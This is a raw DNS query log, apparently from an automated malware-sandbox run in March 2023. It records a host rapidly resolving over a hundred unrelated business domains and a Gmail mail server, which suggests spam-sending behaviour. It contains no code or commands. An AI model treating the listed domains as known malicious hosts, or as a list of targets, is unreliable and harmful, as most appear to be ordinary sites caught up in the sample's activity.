                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.127494097 CET8.8.8.8192.168.2.60xcaf1No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.135416985 CET8.8.8.8192.168.2.60x7d8dNo error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.147907972 CET8.8.8.8192.168.2.60x1211No error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.147907972 CET8.8.8.8192.168.2.60x1211No error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.200335026 CET8.8.8.8192.168.2.60x94b8No error (0)www.hyabmagneter.se104.21.69.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.200335026 CET8.8.8.8192.168.2.60x94b8No error (0)www.hyabmagneter.se172.67.209.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.206959009 CET8.8.8.8192.168.2.60xe7ddNo error (0)78san.com133.242.15.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.216998100 CET8.8.8.8192.168.2.60xb430No error (0)shiner.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.216998100 CET8.8.8.8192.168.2.60xb430No error (0)shiner.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.234761000 CET8.8.8.8192.168.2.60x3e04No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.235336065 CET8.8.8.8192.168.2.60xf2d2Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.236922979 CET8.8.8.8192.168.2.60x7c2cNo error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.236922979 CET8.8.8.8192.168.2.60x7c2cNo error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.254153967 CET8.8.8.8192.168.2.60xc973No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.254153967 CET8.8.8.8192.168.2.60xc973No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.279617071 CET8.8.8.8192.168.2.60x6cd6Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.279649019 CET8.8.8.8192.168.2.60x5937No error (0)adventist.ro104.21.48.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.279649019 CET8.8.8.8192.168.2.60x5937No error (0)adventist.ro172.67.183.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.292650938 CET8.8.8.8192.168.2.60xb39eNo error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.292650938 CET8.8.8.8192.168.2.60xb39eNo error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.292650938 CET8.8.8.8192.168.2.60xb39eNo error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.292650938 CET8.8.8.8192.168.2.60xb39eNo error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.295949936 CET8.8.8.8192.168.2.60x9d23No error (0)x96.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.295949936 CET8.8.8.8192.168.2.60x9d23No error (0)x96.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.316334963 CET8.8.8.8192.168.2.60xf799Name error (3)ludea.cznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.333528042 CET8.8.8.8192.168.2.60x2f1cNo error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.339798927 CET8.8.8.8192.168.2.60xeb8aNo error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.377073050 CET8.8.8.8192.168.2.60x5841No error (0)dspears.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.377073050 CET8.8.8.8192.168.2.60x5841No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.377073050 CET8.8.8.8192.168.2.60x5841No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.377073050 CET8.8.8.8192.168.2.60x5841No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.444696903 CET8.8.8.8192.168.2.60xcdf9No error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.444696903 CET8.8.8.8192.168.2.60xcdf9No error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.444696903 CET8.8.8.8192.168.2.60xcdf9No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com52.200.100.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.444696903 CET8.8.8.8192.168.2.60xcdf9No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.237.200.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.483329058 CET8.8.8.8192.168.2.60x71e0No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.493350029 CET8.8.8.8192.168.2.60xf678Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.520927906 CET8.8.8.8192.168.2.60xd528No error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.521260023 CET8.8.8.8192.168.2.60x9ae4No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.527637959 CET8.8.8.8192.168.2.60x636bNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.527662992 CET8.8.8.8192.168.2.60x7cefNo error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.567332029 CET8.8.8.8192.168.2.60x2084No error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.587981939 CET8.8.8.8192.168.2.60x5771No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.610232115 CET8.8.8.8192.168.2.60x33aeNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.628166914 CET8.8.8.8192.168.2.60x8e6fNo error (0)hyabmagneter.se172.67.209.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.628166914 CET8.8.8.8192.168.2.60x8e6fNo error (0)hyabmagneter.se104.21.69.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.640858889 CET8.8.8.8192.168.2.60xcdcNo error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.652000904 CET8.8.8.8192.168.2.60x2913No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.652000904 CET8.8.8.8192.168.2.60x2913No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.681056976 CET8.8.8.8192.168.2.60x1e8No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.681056976 CET8.8.8.8192.168.2.60x1e8No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.681056976 CET8.8.8.8192.168.2.60x1e8No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.681056976 CET8.8.8.8192.168.2.60x1e8No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.686259031 CET8.8.8.8192.168.2.60xe6eeNo error (0)www.x0c.com185.53.177.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.698307037 CET8.8.8.8192.168.2.60x6b96No error (0)anduran.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.698307037 CET8.8.8.8192.168.2.60x6b96No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.698307037 CET8.8.8.8192.168.2.60x6b96No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.698307037 CET8.8.8.8192.168.2.60x6b96No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.701666117 CET8.8.8.8192.168.2.60x4352Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.701705933 CET8.8.8.8192.168.2.60xeedeNo error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.701705933 CET8.8.8.8192.168.2.60xeedeNo error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.729840040 CET8.8.8.8192.168.2.60xc0c6Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.752006054 CET8.8.8.8192.168.2.60x90b4Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.782494068 CET8.8.8.8192.168.2.60x94e8No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.786976099 CET8.8.8.8192.168.2.60xe366No error (0)pcoyuncu.com213.142.131.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.790854931 CET8.8.8.8192.168.2.60x65dfServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.793716908 CET8.8.8.8192.168.2.60x4cb1No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.793716908 CET8.8.8.8192.168.2.60x4cb1No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.809295893 CET8.8.8.8192.168.2.60x559No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.809295893 CET8.8.8.8192.168.2.60x559No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.810308933 CET8.8.8.8192.168.2.60x7dc3No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.843859911 CET8.8.8.8192.168.2.60x4a35Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.843924046 CET8.8.8.8192.168.2.60x8020No error (0)any-s.net185.104.28.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.863306999 CET8.8.8.8192.168.2.60xe99aNo error (0)www.hyabmagneter.se104.21.69.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.863306999 CET8.8.8.8192.168.2.60xe99aNo error (0)www.hyabmagneter.se172.67.209.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.867836952 CET8.8.8.8192.168.2.60xbf33Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.910093069 CET8.8.8.8192.168.2.60x21ceName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.911977053 CET8.8.8.8192.168.2.60xae3eServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.916563034 CET8.8.8.8192.168.2.60x328cServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.935218096 CET8.8.8.8192.168.2.60x98c4Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.939156055 CET8.8.8.8192.168.2.60x2a26Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.957784891 CET8.8.8.8192.168.2.60xf10Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.960746050 CET8.8.8.8192.168.2.60x54d5No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.007289886 CET8.8.8.8192.168.2.60x3863No error (0)onzcda.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.010349035 CET8.8.8.8192.168.2.60xdc03Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.063275099 CET8.8.8.8192.168.2.60x63cdNo error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.114012957 CET8.8.8.8192.168.2.60xf71Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.114038944 CET8.8.8.8192.168.2.60x201bNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.144062996 CET8.8.8.8192.168.2.60xd223No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.165791035 CET8.8.8.8192.168.2.60x53cbNo error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.179655075 CET8.8.8.8192.168.2.60xa775No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.183670044 CET8.8.8.8192.168.2.60x6b7bNo error (0)shztm.ru52.50.65.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.185615063 CET8.8.8.8192.168.2.60xc135No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.222707033 CET8.8.8.8192.168.2.60xe5d6No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.273637056 CET8.8.8.8192.168.2.60x947bNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.273637056 CET8.8.8.8192.168.2.60x947bNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.273637056 CET8.8.8.8192.168.2.60x947bNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.273637056 CET8.8.8.8192.168.2.60x947bNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.299520969 CET8.8.8.8192.168.2.60x2d3fNo error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.312125921 CET8.8.8.8192.168.2.60xff51No error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.393661976 CET8.8.8.8192.168.2.60xadb3No error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.393661976 CET8.8.8.8192.168.2.60xadb3No error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.402738094 CET8.8.8.8192.168.2.60xd2d4No error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.402738094 CET8.8.8.8192.168.2.60xd2d4No error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.418708086 CET8.8.8.8192.168.2.60x913fNo error (0)shiner.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.418708086 CET8.8.8.8192.168.2.60x913fNo error (0)shiner.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.458908081 CET8.8.8.8192.168.2.60x3badNo error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.463448048 CET8.8.8.8192.168.2.60xb02aNo error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.489552975 CET8.8.8.8192.168.2.60xf08cNo error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.489552975 CET8.8.8.8192.168.2.60xf08cNo error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.489552975 CET8.8.8.8192.168.2.60xf08cNo error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.489552975 CET8.8.8.8192.168.2.60xf08cNo error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.491211891 CET8.8.8.8192.168.2.60xd7e1No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.491211891 CET8.8.8.8192.168.2.60xd7e1No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.534779072 CET8.8.8.8192.168.2.60x3a8cNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.600231886 CET8.8.8.8192.168.2.60x97d2No error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.607922077 CET8.8.8.8192.168.2.60x6664No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.613888025 CET8.8.8.8192.168.2.60x5925No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.635888100 CET8.8.8.8192.168.2.60x84d8No error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.637907982 CET8.8.8.8192.168.2.60x4f74Server failure (2)websy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.639307022 CET8.8.8.8192.168.2.60x44feNo error (0)yhsll.com154.88.50.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.697973013 CET8.8.8.8192.168.2.60x6c9cNo error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.697973013 CET8.8.8.8192.168.2.60x6c9cNo error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.697973013 CET8.8.8.8192.168.2.60x6c9cNo error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.697973013 CET8.8.8.8192.168.2.60x6c9cNo error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.721541882 CET8.8.8.8192.168.2.60x5469No error (0)x96.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.721541882 CET8.8.8.8192.168.2.60x5469No error (0)x96.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.765952110 CET8.8.8.8192.168.2.60x98b3No error (0)polprime.com154.214.189.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.852493048 CET8.8.8.8192.168.2.60x1d9cNo error (0)sgk.home.pl89.161.136.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.872014999 CET8.8.8.8192.168.2.60x29d2No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.872014999 CET8.8.8.8192.168.2.60x29d2No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.921236038 CET8.8.8.8192.168.2.60xdd91No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:17.963006973 CET8.8.8.8192.168.2.60x12dbNo error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.133712053 CET8.8.8.8192.168.2.60xcd5No error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.133712053 CET8.8.8.8192.168.2.60xcd5No error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.194746971 CET8.8.8.8192.168.2.60x4623No error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.208949089 CET8.8.8.8192.168.2.60x124eNo error (0)gmail-smtp-in.l.google.com142.250.27.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.216527939 CET8.8.8.8192.168.2.60xfeb2No error (0)sledsport.ru185.22.232.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.256616116 CET8.8.8.8192.168.2.60xe942No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.256616116 CET8.8.8.8192.168.2.60xe942No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.256616116 CET8.8.8.8192.168.2.60xe942No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.256616116 CET8.8.8.8192.168.2.60xe942No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.257431030 CET8.8.8.8192.168.2.60x53a9No error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.265022039 CET8.8.8.8192.168.2.60x5a96No error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.305763006 CET8.8.8.8192.168.2.60x933No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.349916935 CET8.8.8.8192.168.2.60x8d19No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.349916935 CET8.8.8.8192.168.2.60x8d19No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.351277113 CET8.8.8.8192.168.2.60x49f8Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.373110056 CET8.8.8.8192.168.2.60xbc85No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.383124113 CET8.8.8.8192.168.2.60x434aName error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.388458014 CET8.8.8.8192.168.2.60x5e4aNo error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.388458014 CET8.8.8.8192.168.2.60x5e4aNo error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.408567905 CET8.8.8.8192.168.2.60x2e06No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.408567905 CET8.8.8.8192.168.2.60x2e06No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.408567905 CET8.8.8.8192.168.2.60x2e06No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.408701897 CET8.8.8.8192.168.2.60x3201No error (0)sjbmw.com198.199.101.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.419589996 CET8.8.8.8192.168.2.60x89bfName error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.428978920 CET8.8.8.8192.168.2.60x92b5Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.432881117 CET8.8.8.8192.168.2.60xea49No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.463293076 CET8.8.8.8192.168.2.60x135No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:18.463293076 CET8.8.8.8192.168.2.60x135No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
